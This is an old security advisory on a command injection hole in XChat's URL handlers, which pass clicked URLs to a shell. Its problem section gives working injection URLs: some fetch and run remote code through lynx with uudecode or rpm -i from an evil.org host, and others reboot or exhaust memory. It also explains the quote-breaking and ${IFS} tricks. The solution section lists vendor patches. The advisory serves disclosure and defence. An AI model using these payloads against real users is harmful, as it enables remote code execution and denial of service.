COMMAND
xchat
SYSTEMS AFFECTED
xchat
PROBLEM
Zenith Parsec found following. Just to show what we mean about
the possible danger, start Netscape and enter in xchat, (in a
channel or query window) the following URL.
http://this.should.work.com/cgi-bin/search.cgi?q='`lynx${IFS}-dump${IFS}http://homepages.ihug.co.nz/~Sneuro/thing|uudecode;./thingee`'
Right click on it, and select the Netscape (Existing) or Netscape
(New Window) option. Wait until the URL loads. In a shell on
your machine type
tail -2 ~/.bash_profile
echo You've been hax0red
echo --zen
(oops... should've been You\'ve been hax0red, but u get the idea)
Lucky it wasn't a script that was well written, and designed to
use script kiddie stuff to hack root or something, eh?
For the non-lazy and the lazy who were impressed by the quick
demo...
The hole is in the URL Handler section. Netscape (Existing)
causes XChat to run the command
netscape -remote 'openURL(%s)'
where the %s is replaced by the selected URL eg:
http://homepages.ihug.co.nz/~Sneuro/
causes the command
netscape -remote 'openURL(http://homepages.ihug.co.nz/~Sneuro/)'
which opens that page. Netscape (Run New) causes XChat to run
the command netscape %s and so on.
Backticking and shell expansion. Imagine if someone types:
l00k @ d15 k3w1 w@r3z 5173! http://www.altavista.com/?x=`date`y='`date`'
with the (Existing) or (New Window) options and others that use
'openURL(%s)' type commands to start the program, you get:
netscape -remote 'openURL(http://www.altavista.com/?x=`date`y='`date`')'
count the 's and u will see that at the 2nd `date` they are closed
and then reopened, so that `date` isn't escaped anymore... leaving
it free to run, which it does.
With the (Run New) type commands (that is command %s with no 's
around the %s) you get:
netscape http://www.altavista.com/?x=`date`y='`date`'
which has the 1st `date` unescaped (no 's around it) and so it
executes. In real life though, its unlikely anyone would click
on a URL like
http://`reboot`/'`reboot`'
though. Still, not all that useful, ha? Well, URLs can get
pretty long. For example, a cgi-bin call to somethng can get
quite long.
http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2bbacktick+%2bexploit&stq=10
compare that to:
http://www.altavista.com/cgi-bin/query?pg=q&stype=stext&Translate=on&sc=on&q=%2bxchat+%2b`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1
quick glance... nothing wrong with it.
Well, you seem to have a limitation, in that putting spaces in
doesn't work, nor does redirection.
Well, you can put spaces in. The $IFS variable is probably set.
And who needs redirection, when you can do this:
http://www.altavista.com/?'"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"'
(For (Existing) or (New Window))
http://www.altavista.com/?"`rpm${IFS}-i${IFS}http://evil.org/evil.rpm`"
By the way, a way to exploit this that that's not too blatent, if
you don't mind just DOS-ing the victim, is something like
http://drugs.org/just/say/`yes`
(warning, following said URL in xchat will eat all memory you are
allowed to eat on your system, and thus tends to crash
poorly-configured linux systems).
SOLUTION
It seems that this bug will only affect XChat versions 1.3.9 and
above, up to and including 1.4.2 (the devel series may also be
vulnerable, as there is no mention on the changelog page of this
bug.) (release 1.3.9 was the first to have editable URL handlers,
which seem to be the cause). Verfified bug exists on [x]chat
1.5.5.
Version 1.2.1 of xchat does not appear to be vulnerable.
For Red Hat:
sparc: ftp://updates.redhat.com/6.2/sparc/xchat-1.4.0-2.sparc.rpm
alpha: ftp://updates.redhat.com/6.2/alpha/xchat-1.4.0-2.alpha.rpm
i386: ftp://updates.redhat.com/6.2/i386/xchat-1.4.0-2.i386.rpm
sources: ftp://updates.redhat.com/6.2/SRPMS/xchat-1.4.0-2.src.rpm
For Linux-Mandrake:
7.1/RPMS/xchat-1.4.1-4mdk.i586.rpm
7.1/SRPMS/xchat-1.4.1-4mdk.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/xchat-1.4.2-4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/xchat-1.4.2-4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/xchat-1.4.2-4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/xchat-1.4.2-4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/xchat-1.4.2-4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/xchat-1.4.2-4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/xchat-1.4.2-4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/xchat-1.4.2-4cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/xchat-1.4.2-4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/xchat-1.4.2-4cl.i386.rpm
Just to chime in here, for distributions who haven't released an
update the source for 1.4.2 is available on the author's website
here for the impatient:
http://xchat.linuxpower.org/index.html
The latest stable release of debian is not vulnerable. Others:
http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3-0.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3-0.1.dsc
http://security.debian.org/dists/stable/updates/main/source/xchat_1.4.3.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-all/xchat-common_1.4.3-0.1_all.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat-gnome_1.4.3-0.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat-text_1.4.3-0.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/xchat_1.4.3-0.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/xchat-gnome_1.4.3-0.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/xchat-text_1.4.3-0.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/xchat_1.4.3-0.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/xchat-gnome_1.4.3-0.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/xchat-text_1.4.3-0.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/xchat_1.4.3-0.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat-gnome_1.4.3-0.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat-text_1.4.3-0.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/xchat_1.4.3-0.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat-gnome_1.4.3-0.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat-text_1.4.3-0.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/xchat_1.4.3-0.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat-gnome_1.4.3-0.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat-text_1.4.3-0.1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/xchat_1.4.3-0.1_sparc.deb
Slackware 7.1 does ship with xchat. It is not vulnerable.
An essential update is available immediately from Helix Code,
Inc. via the Helix GNOME Updater and from the following URLs.
For Caldera OpenLinux eDesktop 2.4 systems:
http://spidermonkey.helixcode.com/distributions/Caldera-2.4/xchat-1.4.3-0_helix_1.i386.rpm
For Debian GNU/Linux potato (2.2) and woody systems:
http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat_1.4.3-helix1_i386.deb
http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-common_1.4.3-helix1_all.deb
http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-text_1.4.3-helix1_i386.deb
http://spidermonkey.helixcode.com/distributions/Debian/dists/woody/main/binary-i386/xchat-gnome_1.4.3-helix1_i386.deb
For LinuxPPC systems:
http://spidermonkey.helixcode.com/distributions/LinuxPPC/xchat-1.4.3-0_helix_1.ppc.rpm
For Linux Mandrake systems:
http://spidermonkey.helixcode.com/distributions/Mandrake/xchat-1.4.3-0mdk_helix_1.i586.rpm
For Red Hat Linux systems:
http://spidermonkey.helixcode.com/distributions/RedHat-6/xchat-1.4.3-0_helix_1.i386.rpm
For Solaris running on UltraSparc systems:
http://spidermonkey.helixcode.com/distributions/Solaris/xchat-1.4.3-0_helix_1.sparc64.rpm
For SuSE 6.3 systems:
http://spidermonkey.helixcode.com/distributions/SuSE/xchat-1.4.3-0_helix_1.i386.rpm
For SuSE 6.4 systems:
http://spidermonkey.helixcode.com/distributions/SuSE-6.4/xchat-1.4.3-0_helix_1.i386.rpm
For TurboLinux systems:
http://spidermonkey.helixcode.com/distributions/TurboLinux-6/xchat-1.4.3-0_helix_1.i386.rpm
For Linux-Mandrake:
Linux-Mandrake 7.0: 7.0/RPMS/xchat-1.4.1-4mdk.i586.rpm
7.0/SRPMS/xchat-1.4.1-4mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/xchat-1.4.1-4mdk.i586.rpm
7.1/SRPMS/xchat-1.4.1-4mdk.src.rpm
For FreeBSD:
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/irc/xchat-1.4.3.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/irc/xchat-1.4.3.tgz
Users of Slackware 7.0, 7.1, and -current are urged to upgraded
to the xchat.tgz package available in the Slackware -current
branch:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slakware/gtk/xchat.tgz
Fo TurboLinux:
ftp://ftp.turbolinux.com/pub/updates/6.0/xchat-1.4.3-1.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/xchat-1.4.3-1.src.rpm
Note: You must rebuild and install the RPM if you choose to
download and install the SRPM. Simply installing the SRPM alone
WILL NOT CLOSE THE SECURITY HOLE.